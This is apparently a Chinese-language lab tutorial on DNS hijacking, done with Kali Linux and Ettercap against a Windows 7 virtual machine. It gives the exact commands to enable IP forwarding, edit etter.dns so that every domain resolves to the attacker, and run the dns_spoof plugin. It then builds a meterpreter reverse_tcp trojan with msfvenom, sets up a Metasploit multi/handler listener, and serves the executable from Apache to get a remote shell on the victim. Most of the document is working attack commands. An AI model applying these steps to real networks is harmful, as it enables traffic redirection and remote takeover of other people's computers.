初试DNS劫持
DNS劫持
1.DNS劫持介绍
DNS劫持是指在浏览器访问网站时,恶意程序或黑客将域名解析到错误的IP地址,导致用户无法正常访问网站或被导向其他网站的情况。DNS劫持通常发生在网络中某个节点处,通过修改本地DNS缓存或篡改DNS服务器的响应来实现。
2.环境搭建
2.1环境介绍
主机 | 系统 | IP地址 |
---|---|---|
攻击机 | kali-linux | 192.168.72.129 |
受击机 | windows 7 | 192.168.72.130 |
主要使用的技术是kali的Ettercap
2.2环境介绍
2.2.1确定80端口没有被任何程序占用,若被占用则需杀掉端口
端口:每一个应用程序都有对应的端口;80端口就是apache 服务端口,我们需要确保此端口没被占用;
输入命令:lsof -i:80
判断是否被占用
2.2.2开启端口转发
root
ip-forward 改为1
echo 1 > /proc/sys/net/ipv4/ip_forward
2.2.3开启apache
service apache2 restart
2.2.4测试apache 服务器是否开启
在kali的浏览器中输入 kali的 IP地址
2.2.5查看本机IP
ifconfig
2.2.6修改 etter.dns 将目标改为本机ip
sudo vi /etc/ettercap/etter.dns
进入编辑模式,输入命令:
* A 本机ip
3.使用ettercap进行劫持
3.1启用etterrcap
3.2
在菜单中找到 Plugins ,选中Manage Plugins
4.在kali中向Windows中植入木马
4.1生成木马
输入命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本机IP> LPORT=<端口> -f exe x>木马文件.exe
完成后输入pwd
即可查看位置;
4.2配置文件并启动监听
输入命令:msfconsole
输入命令:use exploit/multi/handler
输入命令:set payload windows/meterpreter/reverse_tcp
输入命令:set lhost kali的ip
输入命令:exploit -z -j
启动监听;输入命令:run
5.复制木马文件到 /var/www/html
5.1受击机运行木马
输入命令:service apache2 start
进入Windows虚拟机中,打开网址"kali的ip/木马名称"
5.2在kali中监听受击机
输入命令:sessions
即可查看被木马如今的用户